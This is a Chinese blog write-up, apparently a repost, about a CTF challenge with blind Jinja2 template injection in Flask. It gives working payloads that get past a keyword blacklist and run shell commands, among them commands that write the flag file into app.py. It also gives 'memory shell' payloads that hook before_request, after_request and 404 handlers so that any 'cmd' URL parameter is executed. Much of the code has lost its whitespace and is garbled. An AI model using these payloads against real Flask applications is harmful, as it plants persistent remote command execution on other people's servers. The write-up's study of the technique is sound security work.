昨天打国赛遇见一个无回显ssti的题目,顺便学习了一下源码:
fromflaskimportFlask,request,render_template_stringimportsocketimportthreadingimporthtmlapp=Flask(__name__)@app.route('/',methods=["GET"])defsource():withopen(__file__,'r',encoding='utf-8')asf:return'<pre>'+html.escape(f.read())+'</pre>'@app.route('/',methods=["POST"])deftemplate():template_code=request.form.get("code")# 安全过滤blacklist=['__','import','os','sys','eval','subprocess','popen','system','r','n']forblackinblacklist:ifblackintemplate_code:return"Forbidden content detected!"result=render_template_string(template_code)print(result)return'ok'ifresultisnotNoneelse'error'classHTTPProxyHandler:def__init__(self,target_host,target_port):self.target_host=target_hostself.target_port=target_portdefhandle_request(self,client_socket):try:request_data=b""whileTrue:chunk=client_socket.recv(4096)request_data+=chunkiflen(chunk)<4096:breakifnotrequest_data:client_socket.close()returnwithsocket.socket(socket.AF_INET,socket.SOCK_STREAM)asproxy_socket:proxy_socket.connect((self.target_host,self.target_port))proxy_socket.sendall(request_data)response_data=b""whileTrue:chunk=proxy_socket.recv(4096)ifnotchunk:breakresponse_data+=chunkheader_end=response_data.rfind(b"rnrn")ifheader_end!=-1:body=response_data[header_end+4:]else:body=response_dataresponse_body=bodyresponse=b"HTTP/1.1 200 OKrn"b"Content-Length: "+str(len(response_body)).encode()+b"rn"b"Content-Type: text/html; charset=utf-8rn"b"rn"+response_bodyclient_socket.sendall(response)exceptExceptionase:print(f"Proxy Error: {e}")finally:client_socket.close()defstart_proxy_server(host,port,target_host,target_port):proxy_handler=HTTPProxyHandler(target_host,target_port)server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server_socket.bind((host,port))server_socket.listen(100)print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")try:whileTrue:client_socket,addr=server_socket.accept()print(f"Connection from {addr}")thread=threading.Thread(target=proxy_handler.handle_request,args=(client_socket,))thread.daemon=Truethread.start()exceptKeyboardInterrupt:print("Shutting down proxy server...")finally:server_socket.close()defrun_flask_app():app.run(debug=False,host='127.0.0.1',port=5000)if__name__=="__main__":proxy_host="0.0.0.0"proxy_port=5001target_host="127.0.0.1"target_port=5000# 安全反代,防止针对响应头的攻击proxy_thread=threading.Thread(target=start_proxy_server,args=(proxy_host,proxy_port,target_host,target_port))proxy_thread.daemon=Trueproxy_thread.start()print("Starting Flask app...")run_flask_app()
可以看见有黑名单:
blacklist=['__','import','os','sys','eval','subprocess','popen','system','r','n']
写文件
第一种方法就是传统的绕过黑名单,采用拼接的方法请看payload:
code={%25set+gl%3d'_'*2%2b'globals'%2b'_'*2%25}{%25set+bu%3d'_'*2%2b'builtins'%2b'_'*2%25}{%25set+im%3d'_'*2%2b'i''mport'%2b'_'*2%25}{%25set+hc%3d'so'[%3a%3a-1]%25}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}}url解码后是这个样子的:code={%set+gl='_'*2+'globals'+'_'*2%}{%set+bu='_'*2+'builtins'+'_'*2%}{%set+im='_'*2+'i''mport'+'_'*2%}{%set+hc='so'[::-1]%}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}}
它使用了 Jinja2 的 {% set %} 语句来创建变量,并且通过这些变量来访问和操作 Python 的全局环境 (globals) 和内置函数 (builtins)
{%set...%}//用于在模板中设置变量。'_'*2+'globals'+'_'*2//用来构造字符串__globals__和__builtins__'_'*2+'import'+'_'*2//试图构造字符串__import__'so'[::-1]//将字符串'so'反转为'os'g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()//这部分代码从globals获取__builtins__.__import__函数,然后用它来导入os模块,并调用os.popen来执行shell命令cat/f*>>app.py,这会将根目录下所有以f开头的文件内容追加到app.py文件中。
访问首页发现成功写入
还可以对首页进行覆盖 payload:
{%25set+gl%3d''*2%2b'globals'%2b''*2%25}{%25set+bu%3d''*2%2b'builtins'%2b''*2%25}{%25set+im%3d''*2%2b'i''mport'%2b''*2%25}{%25set+mx%3d'so'[%3a%3a-1]%25}{{cycler.next[gl][bu]im'p''open'('ls+/>>app.py').read()}}
访问首页
内存马
测试代码:
fromflaskimportFlask,request,render_template_stringimportsocketimportthreadingimporthtmlapp=Flask(__name__)@app.route('/',methods=["GET"])defsource():withopen(__file__,'r',encoding='utf-8')asf:return'<pre>'+html.escape(f.read())+'</pre>'@app.route('/',methods=["POST"])deftemplate():template_code=request.form.get("code")# 安全过滤# blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', 'r', 'n']# for black in blacklist:# if black in template_code:# return "Forbidden content detected!"result=render_template_string(template_code)print(result)return'ok'ifresultisnotNoneelse'error'classHTTPProxyHandler:def__init__(self,target_host,target_port):self.target_host=target_hostself.target_port=target_portdefhandle_request(self,client_socket):try:request_data=b""whileTrue:chunk=client_socket.recv(4096)request_data+=chunkiflen(chunk)<4096:breakifnotrequest_data:client_socket.close()returnwithsocket.socket(socket.AF_INET,socket.SOCK_STREAM)asproxy_socket:proxy_socket.connect((self.target_host,self.target_port))proxy_socket.sendall(request_data)response_data=b""whileTrue:chunk=proxy_socket.recv(4096)ifnotchunk:breakresponse_data+=chunkheader_end=response_data.rfind(b"rnrn")ifheader_end!=-1:body=response_data[header_end+4:]else:body=response_dataresponse_body=bodyresponse=b"HTTP/1.1 200 OKrn"b"Content-Length: "+str(len(response_body)).encode()+b"rn"b"Content-Type: text/html; charset=utf-8rn"b"rn"+response_bodyclient_socket.sendall(response)exceptExceptionase:print(f"Proxy Error: {e}")finally:client_socket.close()defstart_proxy_server(host,port,target_host,target_port):proxy_handler=HTTPProxyHandler(target_host,target_port)server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server_socket.bind((host,port))server_socket.listen(100)print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")try:whileTrue:client_socket,addr=server_socket.accept()print(f"Connection from {addr}")thread=threading.Thread(target=proxy_handler.handle_request,args=(client_socket,))thread.daemon=Truethread.start()exceptKeyboardInterrupt:print("Shutting down proxy server...")finally:server_socket.close()defrun_flask_app():app.run(debug=False,host='127.0.0.1',port=5000)if__name__=="__main__":proxy_host="0.0.0.0"proxy_port=5001target_host="127.0.0.1"target_port=5000# 安全反代,防止针对响应头的攻击proxy_thread=threading.Thread(target=start_proxy_server,args=(proxy_host,proxy_port,target_host,target_port))proxy_thread.daemon=Trueproxy_thread.start()print("Starting Flask app...")run_flask_app()
使用before_request方法构造内存马
before_request 是 Flask 框架中的一个方法,它允许你在每次 HTTP 请求到达视图函数之前执行特定的代码
fromflaskimportFlask,request,gapp=Flask(__name__)@app.before_requestdefbefore_request():# 这里的代码将在每个请求处理之前执行g.start_time=time.time()# 记录请求开始的时间print("This runs before each request.")@app.route('/')defindex():# 这是处理主页请求的视图函数return"Hello, World!"if__name__=='__main__':app.run()
在这个例子中,before_request 函数会在每个请求到来前被调用,并且会打印一条消息到控制台
跟进这个装饰器内部看他调用了哪些函数:
可以看到before_request实际上调用的是self.before_request_funcs.setdefault(None, []).append(f)代码逻辑:
self.before_request_funcs.setdefault(None, []): before_request_funcs 是一个字典,用来存储不同蓝图(或应用程序级别)的 before_request 函数列表。setdefault 方法确保了当键 None 不存在时,会创建一个空列表作为其值。这里 None 代表应用级别的 before_request 函数。 .append(f): 将传入的函数 f 添加到 before_request 函数列表中,这意味着该函数会在每个请求开始前被执行。f就是访问值,也是我们可以自定义的,那么这里只要我们设置f为一个匿名函数,这样每次发起请求前,都会触发一个这个匿名函数了 return f: 返回原始函数 f,这使得装饰器可以用作函数修饰,而不会改变函数本身的行为。
接下来就可以开始构造了
{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('dir').read())")}}
after_request方法构造内存马
与@app.before_request类似,after_request会在请求结束得到响应包之后进行操作代码逻辑:
self.after_request_funcs.setdefault(None, []): after_request_funcs 是一个字典,用来存储不同蓝图(或应用程序级别)的 after_request 函数列表。setdefault 方法确保了当键 None 不存在时,会创建一个空列表作为其值。这里 None 代表应用级别的 after_request 函数。 .append(f): 将传入的函数 f 添加到 after_request 函数列表中,这意味着该函数会在每个请求处理完成后被执行。 return f: 返回原始函数 f,这使得装饰器可以用作函数修饰,而不会改变函数本身的行为。 self.after_request_funcs.setdefault(None, []).append(f)传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象,所以这个是需要定义一个返回值的
构造payload:
{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec("global CmdResp;CmdResp=__import__('flask').make_response(__import__('os').popen(request.args.get('cmd')).read())")==None else resp)",{'request':url_for.__globals__['request'],'app':url_for.__globals__['current_app']})}}
Lambda 函数逻辑:
条件检查:if request.args.get('cmd') 检查请求的查询字符串中是否存在名为 cmd 的参数。 命令执行:如果 cmd 参数存在,那么使用 exec 执行一段 Python 代码,这段代码会读取并执行 cmd 参数中的命令,并将输出封装进一个新的 Flask Response 对象 CmdResp 中。 exec('global CmdResp;CmdResp=make_response(os.popen(request.args.get("cmd")).read())') 注意这里的 os.popen 和 exec 的使用,它们分别用于执行命令和动态执行 Python 代码。 返回值判断:== None 检查 exec 的返回值是否为 None(实际上 exec 总是返回 None)。 最终返回:如果上述条件成立(即 cmd 参数存在且命令成功执行),则返回新的响应对象 CmdResp;否则返回原始的响应对象 resp。
errorhandler方法构造内存马
fromflaskimportFlask,render_templateapp=Flask(__name__)@app.route('/')defindex():return'Hello World'@app.errorhandler(404)defpage_not_found(e):print(e)# 日志记录或其它处理逻辑print('Error handler for 404')return'404 Error'if__name__=='__main__':app.run()
当用户请求了一个不存在的 URL 时,Flask 会调用 page_not_found 函数,要是我能操控404页面返回的东西,那不就可以执行任意代码了吗跟进errorhandler
跟进register_error_handler函数
可以看到exc_class, code这两个变量,code就是404,exc_class是一个对象,f是我们404界面的返回值code和f是我们可以手动构造的,但是exc_class得通过_get_exc_class_and_code函数获取,code_or_exception就是我们之前传的404,那我们就依靠这个来获取变量值,然后覆写即可下面是一个不需要装饰器,直接使用 register_error_handler 方法来注册错误处理程序的例子:
fromflaskimportFlaskapp=Flask(__name__)# 定义一个简单的错误处理程序defhandle_404(e):return'Page not found',404defhandle_exception(e):return'An unexpected error occurred',500# 注册错误处理程序app.register_error_handler(404,handle_404)app.register_error_handler(Exception,handle_exception)if__name__=='__main__':app.run()
如果你多次对同一个 code_or_exception 使用 register_error_handler 方法,后面的调用会覆盖前面的注册。payload:
exec("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None]
[exc_class] = lambda a:__import__('os').popen(request.args.get('cmd')).read()")
payload解读:
global exc_class; global code: 这一部分声明 exc_class 和 code 为全局变量。确保 exc_class 和 code 在后续代码中可以被正确引用。 exc_class, code = app._get_exc_class_and_code(404): 这行代码调用了 Flask 应用实例 app 的私有方法 _get_exc_class_and_code,传入 HTTP 状态码 404。该方法会返回与状态码 404 相关的异常类 (exc_class) 和状态码 (code)。 app.error_handler_spec[None]
[exc_class] = lambda a: __import__('os').popen(request.args.get('cmd')).read(): 这里最关键的部分: app.error_handler_spec 是 Flask 内部用来存储错误处理程序的数据结构。 lambda a: __import__('os').popen(request.args.get('cmd')).read() 创建了一个匿名函数(Lambda),它接收一个参数 a(通常是异常对象),但忽略了这个参数。 它导入了 os 模块,并调用了 popen 方法来执行由 request.args.get('cmd') 获取的命令。request.args.get('cmd') 从 HTTP 请求的查询参数中获取名为 cmd 的值,这意味着任何通过 URL 参数传入的命令都会被执行。 最后,.read() 方法读取命令执行的结果并返回
原文始发于微信公众号(船山信安):对ssti无回显的新版内存马学习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论